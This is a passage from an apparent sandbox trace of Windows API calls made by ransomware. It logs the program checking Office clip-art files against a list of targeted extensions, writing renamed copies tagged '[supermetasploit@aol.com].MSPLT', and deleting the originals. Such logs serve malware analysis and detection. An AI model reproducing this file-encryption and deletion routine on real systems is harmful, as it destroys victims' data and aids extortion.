"c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf")) returned 1 [0310.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.645] lstrlenW (lpString=".doc") returned 4 [0310.645] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.645] lstrlenW (lpString=".docx") returned 5 [0310.645] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.645] lstrlenW (lpString=".pdf") returned 4 [0310.645] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.645] lstrlenW (lpString=".xls") returned 4 [0310.645] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.645] lstrlenW (lpString=".xlsx") returned 5 [0310.645] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.645] lstrlenW (lpString=".ppt") returned 4 [0310.645] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.645] lstrlenW (lpString=".zip") returned 4 [0310.646] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.646] lstrlenW (lpString=".rar") returned 4 [0310.646] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.646] lstrlenW (lpString=".bz2") returned 4 [0310.646] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.646] lstrlenW (lpString=".7z") returned 3 [0310.646] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.646] lstrlenW (lpString=".dbf") returned 4 [0310.646] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.646] lstrlenW (lpString=".1cd") returned 4 [0310.646] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.646] lstrlenW (lpString=".jpg") returned 4 [0310.646] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.646] lstrlenW (lpString=".doc") returned 4 [0310.646] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.646] lstrlenW (lpString=".docx") returned 5 [0310.646] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.646] lstrlenW (lpString=".pdf") returned 4 [0310.646] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.646] lstrlenW (lpString=".xls") returned 4 [0310.646] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.646] lstrlenW (lpString=".xlsx") returned 5 [0310.646] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.646] lstrlenW (lpString=".ppt") returned 4 [0310.647] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.647] lstrlenW (lpString=".zip") returned 4 [0310.647] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.647] lstrlenW (lpString=".rar") returned 4 [0310.647] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.647] lstrlenW (lpString=".bz2") returned 4 [0310.647] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.647] lstrlenW (lpString=".7z") returned 3 [0310.647] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.647] lstrlenW (lpString=".dbf") returned 4 [0310.647] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.647] lstrlenW (lpString=".1cd") returned 4 [0310.647] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0310.647] lstrlenW (lpString=".jpg") returned 4 [0310.647] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.647] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0310.647] lstrlenW (lpString="BS00100_.WMF") returned 12 [0310.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.649] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2378) returned 1 [0310.649] CloseHandle (hObject=0x524) returned 1 [0310.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf")) returned 0x220 [0310.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.649] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.649] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0310.650] GetLastError () returned 0x0 [0310.650] ReadFile (in: hFile=0x524, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x94a, lpOverlapped=0x0) returned 1 [0310.669] WriteFile (in: hFile=0x530, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x950, lpOverlapped=0x0) returned 1 [0310.670] ReadFile (in: hFile=0x524, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0310.670] WriteFile (in: hFile=0x530, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0310.670] SetEndOfFile (hFile=0x530) returned 1 [0310.670] CloseHandle (hObject=0x530) returned 1 [0310.672] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.672] SetEndOfFile (hFile=0x524) returned 1 [0310.678] CloseHandle (hObject=0x524) returned 1 [0310.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0310.705] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf")) returned 1 [0310.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.707] lstrlenW (lpString=".doc") returned 4 [0310.707] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.707] lstrlenW (lpString=".docx") returned 5 [0310.707] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.707] lstrlenW (lpString=".pdf") returned 4 [0310.707] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.707] lstrlenW (lpString=".xls") returned 4 [0310.707] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.707] lstrlenW (lpString=".xlsx") returned 5 [0310.707] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.707] lstrlenW (lpString=".ppt") returned 4 [0310.707] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.707] lstrlenW (lpString=".zip") returned 4 [0310.707] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.707] lstrlenW (lpString=".rar") returned 4 [0310.707] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.707] lstrlenW (lpString=".bz2") returned 4 [0310.707] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.707] lstrlenW (lpString=".7z") returned 3 [0310.707] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.707] lstrlenW (lpString=".dbf") returned 4 [0310.707] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.708] lstrlenW (lpString=".1cd") returned 4 [0310.708] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.708] lstrlenW (lpString=".jpg") returned 4 [0310.708] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.708] lstrlenW (lpString=".doc") returned 4 [0310.708] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.708] lstrlenW (lpString=".docx") returned 5 [0310.708] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.708] lstrlenW (lpString=".pdf") returned 4 [0310.708] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.708] lstrlenW (lpString=".xls") returned 4 [0310.708] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.708] lstrlenW (lpString=".xlsx") returned 5 [0310.708] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.708] lstrlenW (lpString=".ppt") returned 4 [0310.708] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.708] lstrlenW (lpString=".zip") returned 4 [0310.708] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.708] lstrlenW (lpString=".rar") returned 4 [0310.708] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.708] lstrlenW (lpString=".bz2") returned 4 [0310.708] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.709] lstrlenW (lpString=".7z") returned 3 [0310.709] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.709] lstrlenW (lpString=".dbf") returned 4 [0310.709] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.709] lstrlenW (lpString=".1cd") returned 4 [0310.709] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0310.709] lstrlenW (lpString=".jpg") returned 4 [0310.709] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.709] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0310.709] lstrlenW (lpString="BS00135_.WMF") returned 12 [0310.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.710] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=1044) returned 1 [0310.710] CloseHandle (hObject=0x524) returned 1 [0310.710] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf")) returned 0x220 [0310.710] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.711] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.711] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0310.713] GetLastError () returned 0x0 [0310.713] ReadFile (in: hFile=0x524, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x414, lpOverlapped=0x0) returned 1 [0310.722] WriteFile (in: hFile=0x530, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x420, lpOverlapped=0x0) returned 1 [0310.724] ReadFile (in: hFile=0x524, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0310.724] WriteFile (in: hFile=0x530, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0310.724] SetEndOfFile (hFile=0x530) returned 1 [0310.724] CloseHandle (hObject=0x530) returned 1 [0310.725] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.726] SetEndOfFile (hFile=0x524) returned 1 [0310.729] CloseHandle (hObject=0x524) returned 1 [0310.730] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0310.736] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf")) returned 1 [0310.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.737] lstrlenW (lpString=".doc") returned 4 [0310.737] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.737] lstrlenW (lpString=".docx") returned 5 [0310.737] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.737] lstrlenW (lpString=".pdf") returned 4 [0310.737] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.737] lstrlenW (lpString=".xls") returned 4 [0310.737] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.737] lstrlenW (lpString=".xlsx") returned 5 [0310.737] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.737] lstrlenW (lpString=".ppt") returned 4 [0310.737] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.737] lstrlenW (lpString=".zip") returned 4 [0310.737] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.737] lstrlenW (lpString=".rar") returned 4 [0310.737] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.737] lstrlenW (lpString=".bz2") returned 4 [0310.737] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.737] lstrlenW (lpString=".7z") returned 3 [0310.738] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.738] lstrlenW (lpString=".dbf") returned 4 [0310.738] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.738] lstrlenW (lpString=".1cd") returned 4 [0310.738] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.738] lstrlenW (lpString=".jpg") returned 4 [0310.738] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.738] lstrlenW (lpString=".doc") returned 4 [0310.738] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.738] lstrlenW (lpString=".docx") returned 5 [0310.738] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.738] lstrlenW (lpString=".pdf") returned 4 [0310.738] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.738] lstrlenW (lpString=".xls") returned 4 [0310.738] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.738] lstrlenW (lpString=".xlsx") returned 5 [0310.738] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.738] lstrlenW (lpString=".ppt") returned 4 [0310.738] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.739] lstrlenW (lpString=".zip") returned 4 [0310.739] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.739] lstrlenW (lpString=".rar") returned 4 [0310.739] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.739] lstrlenW (lpString=".bz2") returned 4 [0310.739] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.739] lstrlenW (lpString=".7z") returned 3 [0310.739] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.739] lstrlenW (lpString=".dbf") returned 4 [0310.739] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.739] lstrlenW (lpString=".1cd") returned 4 [0310.739] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 68 [0310.739] lstrlenW (lpString=".jpg") returned 4 [0310.739] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.739] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0310.739] lstrlenW (lpString="BS00136_.WMF") returned 12 [0310.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.740] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2166) returned 1 [0310.740] CloseHandle (hObject=0x524) returned 1 [0310.740] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf")) returned 0x220 [0310.741] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.741] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.741] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0310.810] GetLastError () returned 0x0 [0310.810] ReadFile (in: hFile=0x524, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x876, lpOverlapped=0x0) returned 1 [0310.818] WriteFile (in: hFile=0x534, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x880, lpOverlapped=0x0) returned 1 [0310.820] ReadFile (in: hFile=0x524, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0310.820] WriteFile (in: hFile=0x534, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0310.820] SetEndOfFile (hFile=0x534) returned 1 [0310.820] CloseHandle (hObject=0x534) returned 1 [0310.824] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.824] SetEndOfFile (hFile=0x524) returned 1 [0310.829] CloseHandle (hObject=0x524) returned 1 [0310.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0310.832] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf")) returned 1 [0310.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.833] lstrlenW 